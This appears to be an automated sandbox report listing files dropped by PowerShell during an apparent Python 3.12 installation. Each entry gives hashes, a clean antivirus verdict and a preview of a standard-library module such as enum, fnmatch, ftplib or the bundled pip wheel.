                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2954
                                                                                                                                                                                                              Entropy (8bit):4.703525654326454
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:XnE2/bf1OV5FPdLLlKTOARSMoxz1AFPLpLGpW7NRp6/df1Fo141RzuwBvIvPTKrf:XESf1OVjPpUOAoMot8P1HJydf/omXu+P
                                                                                                                                                                                                              MD5:C62CEDA36D6B362A2250094DFA2EF15A
                                                                                                                                                                                                              SHA1:D96068DC9790D38B44F3DA580F134EF1C7288B33
                                                                                                                                                                                                              SHA-256:3991C68ACBB5CE946C6BA71CCB044FBBB449F9EAC9B76262456537EAEBEF9340
                                                                                                                                                                                                              SHA-512:6C0296817CA26680858DB78B38BF1D1BE39FC7EDB7894979251EA3281496E7447914A12C9C5B41A1EAD12610DD472C00FF9752816FE30CFF4298C083DA29B3A3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""Python 'uu_codec' Codec - UU content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com). Some details were..adapted from uu.py which was written by Lance Ellinghouse and..modified by Jack Jansen and Fredrik Lundh..."""....import codecs..import binascii..from io import BytesIO....### Codec APIs....def uu_encode(input, errors='strict', filename='<data>', mode=0o666):.. assert errors == 'strict'.. infile = BytesIO(input).. outfile = BytesIO().. read = infile.read.. write = outfile.write.... # Remove newline chars from filename.. filename = filename.replace('\n','\\n').. filename = filename.replace('\r','\\r').... # Encode.. write(('begin %o %s\n' % (mode & 0o777, filename)).encode('ascii')).. chunk = read(45).. while chunk:.. write(binascii.b2a_uu(chunk)).. chunk = read(45).. write(b' \nend\n').... return (outfile.getvalue(), len(input))....def uu_decode(input, error
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2281
                                                                                                                                                                                                              Entropy (8bit):4.555875191198799
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:XLDD4W1AIejO1AI73101ouY51wdP7z0I51wzD5x6Ftx0+HvIvPTKyJxTPH:XHD4W/ejO/73OauY5y7z/58uXnA3TKyD
                                                                                                                                                                                                              MD5:77C7F92636D3B55460B5E1AFD451D5DB
                                                                                                                                                                                                              SHA1:DCE6B27A30BC191F9CFA34DEA5A27682AE274DE4
                                                                                                                                                                                                              SHA-256:9B660028249BDB7E9B80AF1D5432BF0C90B132A6D0DD205E2DED2A3B3275B728
                                                                                                                                                                                                              SHA-512:93E2E6197321CAD932F88F234EBFAD23F88ABB00C18D2F80C5711D15119CA4D0D1AB261156D6E9A7E1FEEA8A30675759823A3353F353551BA887101CDBBFA98D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""Python 'zlib_codec' Codec - zlib compression encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import zlib # this codec needs the optional zlib module !....### Codec APIs....def zlib_encode(input, errors='strict'):.. assert errors == 'strict'.. return (zlib.compress(input), len(input))....def zlib_decode(input, errors='strict'):.. assert errors == 'strict'.. return (zlib.decompress(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return zlib_encode(input, errors).. def decode(self, input, errors='strict'):.. return zlib_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. assert errors == 'strict'.. self.errors = errors.. self.compressobj = zlib.compressobj().... def encode(self, input, final=False):.. if final:.. c
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9734
                                                                                                                                                                                                              Entropy (8bit):4.712839348125911
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:F0LxaCi8IROG2kcYfJJg4/PwO/sROSs4bGdJAlAPvTGf4RNttRm:F0LxBIRf2A0IWOSsHdQGM6Nxm
                                                                                                                                                                                                              MD5:A834506779D4F1745E722F61C7B7FB24
                                                                                                                                                                                                              SHA1:C7939881FEC4FF3E305875232635DB0EEC91C6AD
                                                                                                                                                                                                              SHA-256:CA96B1B61EF834837C1242BF875D012012ECE0CBB2E4AA2E4F631BBD595E842F
                                                                                                                                                                                                              SHA-512:14A26599A631F35AA57DF92827CD5B5EBF93897C27C374F59D6B213C17D3EBEDE49F6E30FA92D7BA14041FF276E067E19BE985A3217E33DA92A207C10621DF00
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:import collections..import os..import os.path..import subprocess..import sys..import sysconfig..import tempfile..from importlib import resources......__all__ = ["version", "bootstrap"].._PACKAGE_NAMES = ('pip',).._PIP_VERSION = "24.0".._PROJECTS = [.. ("pip", _PIP_VERSION, "py3"),..]....# Packages bundled in ensurepip._bundled have wheel_name set...# Packages from WHEEL_PKG_DIR have wheel_path set..._Package = collections.namedtuple('Package',.. ('version', 'wheel_name', 'wheel_path'))....# Directory of system wheel packages. Some Linux distribution packaging..# policies recommend against bundling dependencies. For example, Fedora..# installs wheel packages in the /usr/share/python-wheels/ directory and don't..# install the ensurepip._bundled package..._WHEEL_PKG_DIR = sysconfig.get_config_var('WHEEL_PKG_DIR')......def _find_packages(path):.. packages = {}.. try:.. filenames = os.listdir(path).. except OSError:.. # Ignore: path
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):93
                                                                                                                                                                                                              Entropy (8bit):4.307585564430433
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:JSdQsMn3oUHhAjpv/F0L4MlCAS5Novn:cQsAYsAjpH3lAS/ov
                                                                                                                                                                                                              MD5:B66408AC25B2935927C825261FAE1D47
                                                                                                                                                                                                              SHA1:29C8161ACB7EB3E46C1F0E7AB2F72510DAF103F9
                                                                                                                                                                                                              SHA-256:BE2DEE4F4B55958AAB36AEBBE6D2D644065E9C36A6DD44727E955FC590501925
                                                                                                                                                                                                              SHA-512:534FACB1A57F917AA343D69221B6F8F4150565730715C71069A1961B6CA425631307AF98FDA5069CBF7FE996D3A14D09DE5F6A9EFD22C6987C16E76F29A31CF0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:import ensurepip..import sys....if __name__ == "__main__":.. sys.exit(ensurepip._main())..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9567
                                                                                                                                                                                                              Entropy (8bit):5.495322075022345
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:phWKV5oPIbHN9a94saXBsn6O153/TkNKBSIGVIv1W8ZlfppVs:XVV5mZ9UR+15401jZlhpVs
                                                                                                                                                                                                              MD5:38FE12EDC04A1BD9670825881A4C0841
                                                                                                                                                                                                              SHA1:E10BACB48B79E385B4224872C37A8D3A51001593
                                                                                                                                                                                                              SHA-256:97A8C628CBE61A0FEFF64EB8EB67471D4CED02148D86E15AE424D34454313021
                                                                                                                                                                                                              SHA-512:E994F029E6E6082D4E7E5183443072F12CB88D1D4FD7841F171C00120915D159D8FD67C220BC386B79C527267F71A268BDB33DD06E1903DAC291973CD618531D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e.&..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.g.Z.d.Z.d.Z.d.e.d.f.g.Z...e.j...................d.d.........Z...e.j...................d.........a.d...Z.d...Z.d.a.d.d...Z.d...Z.d...Z.d.d.d.d.d.d.d...d...Z.d.d.d.d.d.d.d...d...Z.d.d...d...Z.d.d...Z.y.)......N)...resources..version..bootstrap)...pipz.24.0r......py3..Package).r......wheel_name..wheel_path..WHEEL_PKG_DIRc..........................i.}...t.........j...................|.........}.t.........|.........}.|.D.]...}.|.j...................d.........s...t.........D.]...}.|.d.z...}.|.j...................|.........s.....n....9|.j...................|.........j...................d.........d.....}.t.........j...................j...................|.|.........}.t.........|.d.|.........|.|.<.......|.S.#.t.........$.r...d.}.Y...w.x.Y.w.).N..z..whl..-r....)...os..listdir..OSError..sorted..endswith.._PACKAGE_NAMES..startswith..removeprefix..partition..path..join.._Package).r..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):372
                                                                                                                                                                                                              Entropy (8bit):4.9470922589113355
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:4KjxIllIlkZzhe9IuQLWaQlb2+u95/n23d6nH46Iayle+llVSuvhpy6t7Xxt:4KjxI/jduRb4/2InKayleuMu5py6t7Xb
                                                                                                                                                                                                              MD5:2449D32F83289DFF0A3E57568B405B12
                                                                                                                                                                                                              SHA1:18E6FE10F73A93F68515CEAC1F1A65BF88B88606
                                                                                                                                                                                                              SHA-256:F26105DA495A63D4162F43A90D15F8AD27F4B612BE9B96B09427687EB8A1E161
                                                                                                                                                                                                              SHA-512:34FD4225A11495F41F40A0FAD0270F7EBDB4FCBD3827092A9DD0CF832ED8787009ECBD46ADAF9EB9F29E728A8C5E0B808CB0F7156A89B2CD91D15CE654DBA4F1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e].........................b.....d.d.l.Z.d.d.l.Z.e.d.k(..r"..e.j.....................e.j.....................................y.y.)......N..__main__)...ensurepip..sys..__name__..exit.._main........XC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\ensurepip\__main__.py..<module>r........s/..................z.......C.H.H._.Y._._...........r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2110226
                                                                                                                                                                                                              Entropy (8bit):7.989601069085752
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:49152:MV+RRK1eWXNS0vVOdKNqeLPC8/Lmy0KXBVctxYx4Xn+foz:MV+fG/AAVOdKh2ZL5txYIgoz
                                                                                                                                                                                                              MD5:74E3C5E4082113B1239CA0E9ABFD1E82
                                                                                                                                                                                                              SHA1:E44313AE1E6AF3C2BD3B60AB2FA8C34308D00555
                                                                                                                                                                                                              SHA-256:BA0D021A166865D2265246961BEC0152FF124DE910C5CC39F1156CE3FA7C69DC
                                                                                                                                                                                                              SHA-512:5D7462A584105BCCAA9CF376F5A8C5827EAD099C813C8AF7392D478A4398F373D9E8CAC7BBAD2DB51B335411AB966B21E119B1B1234C9A7AB70C6DDFC9306DA6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:PK.........NCXP.&.....c.......pip/__init__.py=P.J.@...W.^ta..YP..^.A..e).m...!I]..Nw.@.....Z.#.(t@c...I.[.NJ1.....C..T..@...1...FO..s'._...|8d.W....W....\EQ..$...F.W....1.3..B..&A8.(...S.:.....LI...{.....{hP=...A.^5I.\G.OG[..9y.5..L(.q..dWg....d..Vwv.,i1(.)fT....../V.u.p...l.?PK.........NCXo......V.......pip/__main__.py]RKo.0...W.....9.K..w-v..C..-......#..i......(....<.t...E..o8..BY.q..9Ft.......QD.|\..~.4 ..9...U.W.&.4.@=......y.`f..y...J....~.D...h...!.E!s..8.0..9..R.p....._.....4x..S...........[.......&.t.....Y{U.|.NG..G.....qvN[....G1e........!..1.u.p...\pw)...4.0......n.`.U0m..3..w.O........m'C.m..n..1I..L.VE8E..#+?...........r.zC..!h...meb!{.@.q.7....I......52../..\._.:.<..w..yO.x.<8..c.Nu&......e...e..).MK..p......Y......]..P..|...PK.........NCX~.%.............pip/__pip-runner__.py}T.n.0...+8.0.p...0 X..E...dIz..BPl..fK.$g1...H;N....$.......p......./[.k. 3u...Z...Qt.AB...-j..7..].>..%...D..-+.A:P...xC..H........~.aEiUm.......38/=.5.0......'t
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):839
                                                                                                                                                                                                              Entropy (8bit):4.54535391507707
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:8QVm1VQL7MNrhuUYyy+Y01uV9gTlHpHILpy/ov:8QIrQLYloVbv6ugTtyLQq
                                                                                                                                                                                                              MD5:A924387CC28E1ACF2CBCC6D16A000F01
                                                                                                                                                                                                              SHA1:B789691D39DEF8C95D67782D6CB91EAEDB05FE8B
                                                                                                                                                                                                              SHA-256:B24642D35A69A8378BD4C8A034C79EFDF0D582D5562ACFCF19F790A90A7D508C
                                                                                                                                                                                                              SHA-512:A3B5934447A95720D5968EB460A62C2A07B60A6F1073E87EC4FFA3AE7BD2865760404096769484D4C20622A5AF655E97BA1592F09EFE5ED9232DF10D0B390C77
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""Basic pip uninstallation support, helper for the Windows uninstaller"""....import argparse..import ensurepip..import sys......def _main(argv=None):.. parser = argparse.ArgumentParser(prog="python -m ensurepip._uninstall").. parser.add_argument(.. "--version",.. action="version",.. version="pip {}".format(ensurepip.version()),.. help="Show the version of pip this will attempt to uninstall.",.. ).. parser.add_argument(.. "-v", "--verbose",.. action="count",.. default=0,.. dest="verbosity",.. help=("Give more output. Option is additive, and can be used up to 3 ".. "times."),.. ).... args = parser.parse_args(argv).... return ensurepip._uninstall_helper(verbosity=args.verbosity)......if __name__ == "__main__":.. sys.exit(_main())..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):82674
                                                                                                                                                                                                              Entropy (8bit):4.2245515290398234
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:kNqAIGPR3NYXgvHGe0TkZ+UqfSRCygwMhtbe4/DurHZXLlkPOlRbEuxAX0riAX:kNqAZPR3NYXgvHGe0oZzRCygwOtbe4/G
                                                                                                                                                                                                              MD5:4979EE28B0185CC180B9D1C22F5402BC
                                                                                                                                                                                                              SHA1:6C90A8C0CB83FC7CF6E0CE2D13F516D821D18213
                                                                                                                                                                                                              SHA-256:A72A7DD619B213922D47094FF5BCAB30E59A60404249C71923EA4D8D881EDE00
                                                                                                                                                                                                              SHA-512:AF596BAD9057A0C71CA1ECA6C548F1525D8087E118C121A589AEE2252D4056CDFA326AB498965551EE7D349C64FA544AFF08876E9C3B076E4F984AACC0591404
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import sys..import builtins as bltns..from types import MappingProxyType, DynamicClassAttribute..from operator import or_ as _or_..from functools import reduce......__all__ = [.. 'EnumType', 'EnumMeta',.. 'Enum', 'IntEnum', 'StrEnum', 'Flag', 'IntFlag', 'ReprEnum',.. 'auto', 'unique', 'property', 'verify', 'member', 'nonmember',.. 'FlagBoundary', 'STRICT', 'CONFORM', 'EJECT', 'KEEP',.. 'global_flag_repr', 'global_enum_repr', 'global_str', 'global_enum',.. 'EnumCheck', 'CONTINUOUS', 'NAMED_FLAGS', 'UNIQUE',.. 'pickle_by_global_name', 'pickle_by_enum_name',.. ]......# Dummy value for Enum and Flag as there are explicit checks for them..# before they have been created...# This is also why there are checks in EnumType like `if Enum is not None`..Enum = Flag = EJECT = _stdlib_enums = ReprEnum = None....class nonmember(object):.. """.. Protects item from becoming an Enum member during class creation... """.. def __init__(sel
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10500
                                                                                                                                                                                                              Entropy (8bit):4.528557394014585
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:S4TNBBnKhVsBrA7go4ly/vF1AUCzRUYqRvmC14ziCI6M/UtNiYPWEiOVtYh3+BdI:SWZvoF/vrierHCJM/Utvtc3+T9x9FxS
                                                                                                                                                                                                              MD5:401DB769DA5728550DB93FF9D4B8B8C9
                                                                                                                                                                                                              SHA1:C6EDB036A7A071D323AC8744C8B1EC837C0F078D
                                                                                                                                                                                                              SHA-256:AA9E254243EDCC519AC1915BC5FD7AA384AD1C1E5E140CBD6BF0C77CC73D198F
                                                                                                                                                                                                              SHA-512:E156F3F7462FA108F31612C9326C265EA31359F44BF6096D989151115DA7946673DB50D0732B3B00B9F9305BC5780F71873AE59D2493F4C2FDEE75508865097A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Utilities for comparing files and directories.....Classes:.. dircmp....Functions:.. cmp(f1, f2, shallow=True) -> int.. cmpfiles(a, b, common) -> ([], [], []).. clear_cache()...."""....import os..import stat..from itertools import filterfalse..from types import GenericAlias....__all__ = ['clear_cache', 'cmp', 'dircmp', 'cmpfiles', 'DEFAULT_IGNORES']...._cache = {}..BUFSIZE = 8*1024....DEFAULT_IGNORES = [.. 'RCS', 'CVS', 'tags', '.git', '.hg', '.bzr', '_darcs', '__pycache__']....def clear_cache():.. """Clear the filecmp cache.""".. _cache.clear()....def cmp(f1, f2, shallow=True):.. """Compare two files..... Arguments:.... f1 -- First file name.... f2 -- Second file name.... shallow -- treat files as identical if their stat signatures (type, size,.. mtime) are identical. Otherwise, files are considered different.. if their sizes or contents differ. [default: True].... Return value:.... True if the files are the same
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16156
                                                                                                                                                                                                              Entropy (8bit):4.328063649196717
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:aPuyi2h40tVqXZqRPUJeRalQFufMR2RgzRXhRWRhRHR8p8iqK/5V6E0j0ZP5Od/C:muy7h40QZqR/nFufe8gNXXcXx4TVPZPn
                                                                                                                                                                                                              MD5:5A4891CC3AC46851BC767DDCB8E3D673
                                                                                                                                                                                                              SHA1:1F2FC6FE33DF8844AC619D3D5037EDCBDEA78662
                                                                                                                                                                                                              SHA-256:BAC33A85F39799938D6A532886F801F34CE29B8B2563F55EF7E56B41B3B9E44E
                                                                                                                                                                                                              SHA-512:B2B6D8B00F27F9C349BA8129843AA3F686F7A19A0874D514759D0B7ACBA92EB82580DF42BE2B51C87044661999F8F5E928DD2FA0F9B9E151BE718E59F7AAE84F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Helper class to quickly write a loop over all standard input files.....Typical use is:.... import fileinput.. for line in fileinput.input(encoding="utf-8"):.. process(line)....This iterates over the lines of all files listed in sys.argv[1:],..defaulting to sys.stdin if the list is empty. If a filename is '-' it..is also replaced by sys.stdin and the optional arguments mode and..openhook are ignored. To specify an alternative list of filenames,..pass it as the argument to input(). A single file name is also allowed.....Functions filename(), lineno() return the filename and cumulative line..number of the line that has just been read; filelineno() returns its..line number in the current file; isfirstline() returns true iff the..line just read is the first line of its file; isstdin() returns true..iff the line was read from sys.stdin. Function nextfile() closes the..current file so that the next iteration will read the first line from..the next file (if any); lines not
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6184
                                                                                                                                                                                                              Entropy (8bit):4.341535614254614
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:mPdA3GVpok8oQAhpt4CLJzovn6WkPmByCJi9Xknf06cwVPR4E:a4VFaJQyCJi9XkBfx
                                                                                                                                                                                                              MD5:25330CC531D5B235ACEF733F724A4D2C
                                                                                                                                                                                                              SHA1:C2D58AA844C8AE698B214C40D37A12210508594B
                                                                                                                                                                                                              SHA-256:146D27A2853CD14C95EE49CC6130B9F84E2A56618DD1BE695CDDB20489460425
                                                                                                                                                                                                              SHA-512:1D0182832A5438068A17C51BD984D58EC7F9DB8AFCD4EAE10D2943794A269A096CAA501AD74A333756D15BD5F5275E01CBD55E2E4625570CD5BA44FCFBAD30AF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Filename matching with shell patterns.....fnmatch(FILENAME, PATTERN) matches according to the local convention...fnmatchcase(FILENAME, PATTERN) always takes case in account.....The functions operate by translating the pattern into a regular..expression. They cache the compiled regular expressions for speed.....The function translate(PATTERN) returns a regular expression..corresponding to PATTERN. (It does not compile it.).."""..import os..import posixpath..import re..import functools....__all__ = ["filter", "fnmatch", "fnmatchcase", "translate"]....def fnmatch(name, pat):.. """Test whether FILENAME matches PATTERN..... Patterns are Unix shell style:.... * matches everything.. ? matches any single character.. [seq] matches any character in seq.. [!seq] matches any char not in seq.... An initial period in FILENAME is not special... Both FILENAME and PATTERN are first case-normalized.. if the operating system requires it... If you don't wa
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39055
                                                                                                                                                                                                              Entropy (8bit):4.466111115142351
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:s77Tfh/N5O9LGWKQF4TtnnBbV2ZmEpSgBX3+:s77VOFWTtnnQSAXO
                                                                                                                                                                                                              MD5:7E2850AC9B9E3A17FF1565D843C90673
                                                                                                                                                                                                              SHA1:8A36CF259DE590F018F729D450FA5D1BD5B19DF0
                                                                                                                                                                                                              SHA-256:54DDEF0252DDBE76A3BEF3D821E1AE96BB5C655A1621B3B913C3EBDE9D762A00
                                                                                                                                                                                                              SHA-512:9E0B5100C017961811E47D887B0AADDC2F143506C1E9EEBDDA14E9FCDAF505BB7EC1FE26DEB96625AE150DCAA0B22366ACA6E73E66FA71D424924FA8D072663D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Originally contributed by Sjoerd Mullender...# Significantly modified by Jeffrey Yasskin <jyasskin at gmail.com>....."""Fraction, infinite-precision, rational numbers."""....from decimal import Decimal..import functools..import math..import numbers..import operator..import re..import sys....__all__ = ['Fraction']......# Constants related to the hash implementation; hash(x) is based..# on the reduction of x modulo the prime _PyHASH_MODULUS..._PyHASH_MODULUS = sys.hash_info.modulus..# Value to be used for rationals that reduce to infinity modulo..# _PyHASH_MODULUS..._PyHASH_INF = sys.hash_info.inf....@functools.lru_cache(maxsize = 1 << 14)..def _hash_algorithm(numerator, denominator):.... # To make sure that the hash of a Fraction agrees with the hash.. # of a numerically equal integer, float or Decimal instance, we.. # follow the rules for numeric hashes outlined in the.. # documentation. (See library docs, 'Built-in Types')..... try:.. dinv = pow(denominator,
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35701
                                                                                                                                                                                                              Entropy (8bit):4.519184524404518
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:xp+qv4dk/rJQJ9+Lx8CDSh8Y+3+amuimaw+QpkRi3edm:xpDTzJQJiDSh8Y+3+fuKMsi3ec
                                                                                                                                                                                                              MD5:C76032BAC296A9BAAA8A1208DF75FCBE
                                                                                                                                                                                                              SHA1:595516EA93DB2EC75426AB244A8A0E979A5C985B
                                                                                                                                                                                                              SHA-256:B651A03A02373EE9844C52C5598CAB1ECB4F6D8E7864B514A303010AC32945EF
                                                                                                                                                                                                              SHA-512:291333D13A2D2365CBB9A84AB2CC8E72109DBC9B559D1A50819B2B24B902EACD2BBC1477560D6B392B44E877AFC1604312C47433684EDBE4D78BC7FB3D0EA643
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""An FTP client class and some helper functions.....Based on RFC 959: File Transfer Protocol (FTP), by J. Postel and J. Reynolds....Example:....>>> from ftplib import FTP..>>> ftp = FTP('ftp.python.org') # connect to host, default port..>>> ftp.login() # default, i.e.: user anonymous, passwd anonymous@..'230 Guest login ok, access restrictions apply.'..>>> ftp.retrlines('LIST') # list directory contents..total 9..drwxr-xr-x 8 root wheel 1024 Jan 3 1994 ...drwxr-xr-x 8 root wheel 1024 Jan 3 1994 ....drwxr-xr-x 2 root wheel 1024 Jan 3 1994 bin..drwxr-xr-x 2 root wheel 1024 Jan 3 1994 etc..d-wxrwxr-x 2 ftp wheel 1024 Sep 5 13:43 incoming..drwxr-xr-x 2 root wheel 1024 Nov 17 1993 lib..drwxr-xr-x 6 1094 wheel 1024 Sep 13 19:07 pub..drwxr-xr-x 3 root wheel 1024 Jan 3 1994 usr..-rw-r--r-- 1 root root 312 Aug 1 1994 welcome.msg..'226 Transfer complete.'..>>> ft
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39132
                                                                                                                                                                                                              Entropy (8bit):4.545306756804744
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:sWkDM+q6JeCAkxPN2NqXBF7sMHrCXZdgbV6ncxCD+jG:sWki6JeCAk7v7sMHrCpESfZ
                                                                                                                                                                                                              MD5:3638D2608C42E3A3BF3B2B1C51B765F4
                                                                                                                                                                                                              SHA1:BE947A9B8301BBEDF2406416AC908963279B46CD
                                                                                                                                                                                                              SHA-256:BD6F192C31C5E266AD9EEC9F550B8BC485F90D583764FF81AA3F36D1209F005E
                                                                                                                                                                                                              SHA-512:14B60F0B5119B90FCD4DB3B0AEB48EC4CA9775910470178796BA54C0D16F8887B9A3D283F925AF779A1CC6BC99D25F016CCCBF2BB72D4A9099BB821A54A2B418
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""functools.py - Tools for working with functions and callable objects.."""..# Python module wrapper for _functools C module..# to allow utilities written in Python to be added..# to the functools module...# Written by Nick Coghlan <ncoghlan at gmail.com>,..# Raymond Hettinger <python at rcn.com>,..# and .ukasz Langa <lukasz at langa.pl>...# Copyright (C) 2006-2013 Python Software Foundation...# See C source code for _functools credits/copyright....__all__ = ['update_wrapper', 'wraps', 'WRAPPER_ASSIGNMENTS', 'WRAPPER_UPDATES',.. 'total_ordering', 'cache', 'cmp_to_key', 'lru_cache', 'reduce',.. 'partial', 'partialmethod', 'singledispatch', 'singledispatchmethod',.. 'cached_property']....from abc import get_cache_token..from collections import namedtuple..# import types, weakref # Deferred to single_dispatch()..from reprlib import recursive_repr..from _thread import RLock..from types import GenericAlias......#############################################
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5468
                                                                                                                                                                                                              Entropy (8bit):4.6213245159421765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:jqF24r0OS60O0gJN1Ng+jl2LyqSgPGfGeYM6Zf8lG4iuRs+laP8q+PCI7ocfz/r7:jqk4r0v60hePDhWL+fuMeebiuRPr/r/j
                                                                                                                                                                                                              MD5:F2DA5A9BDBCCABBDD44D309002EA9661
                                                                                                                                                                                                              SHA1:9DD844C2F69BE7C076B746F41F41B2FFAF7120A6
                                                                                                                                                                                                              SHA-256:C540A28C560234D4D00D3451DFDDE05B404F81A38BDE87086CE8773021E1CC1B
                                                                                                                                                                                                              SHA-512:C9E2465CD02976025A9831CFECB4C8E9B34D3DF2725A801EAF5E4C26EF8F90ED69E545D5990F6353BF4450D8D4E2BD020F46B854A74EC1C06FAB9A78F09C5F1C
